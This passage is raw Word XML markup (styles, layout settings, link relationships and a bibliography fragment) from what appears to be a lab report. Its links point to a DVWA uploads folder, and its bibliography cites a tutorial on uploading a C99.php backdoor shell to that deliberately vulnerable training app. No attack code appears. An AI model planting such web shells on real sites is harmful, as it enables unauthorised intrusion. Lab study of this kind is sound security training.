      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambr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2355"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="000B2355"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="000B2355"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria" w:cstheme="majorBidi"/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="0028153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8153C"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0028153C"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0028153C"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0028153C"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0028153C"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0028153C"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0028153C"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0028153C"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002815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53C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002815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153C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Bibliography">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="37"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0028153C"/>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BC49A6"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000B08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568679">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="259339398">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="275530118">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="375005383">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="488255005">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="492572813">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="570425771">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="589310412">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="615213588">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="619141731">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="681012721">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="747578642">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="783185081">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="841748750">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="879054233">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="907767561">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1063791884">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1073238882">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1172991410">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1255243097">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1269891206">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1322343749">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1338844511">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1348168889">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1386757273">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1488983282">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1516460456">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1550725411">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1591769910">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1626503160">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1702775979">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1723670611">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1735736732">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1763184459">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1799493483">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1880362331">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1928032108">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1971862057">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1998684138">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2095121805">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2131319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10.png"/><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192.168.43.174/dvwa/hackable/uploads/"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computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson14/stuff.rar"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0.wdp"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.43.174/dvwa/hackable/uploads/"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B9CE30196E9B445A1C2C642085D5337" ma:contentTypeVersion="0" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="30d09db35d0f6d335a5d26877ab5a700">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="2f398bef331dcebccce7d0986ea3a6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Com13</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{B2DF6275-4FCE-480B-BAFC-0018D416CD45}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Student</b:Last>
            <b:First>Computer</b:First>
            <b:Middle>Secuirty</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Damn Vulnerable Web App (DVWA): Lesson 14 - Upload and use C99.php Backdoor shell</b:Title>
    <b:InternetSiteTitle>computersecuritystudent</b:InternetSiteTitle>
    <b:Year>2013</b:Year>
    <b:Month>February</b:Month>
    <b:Day>27</b:Day>
    <b:URL>https://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson14/index.html</b:URL>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Jus01</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{81BA41A9-49F8-41FB-8D39-E2AB8488238E}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
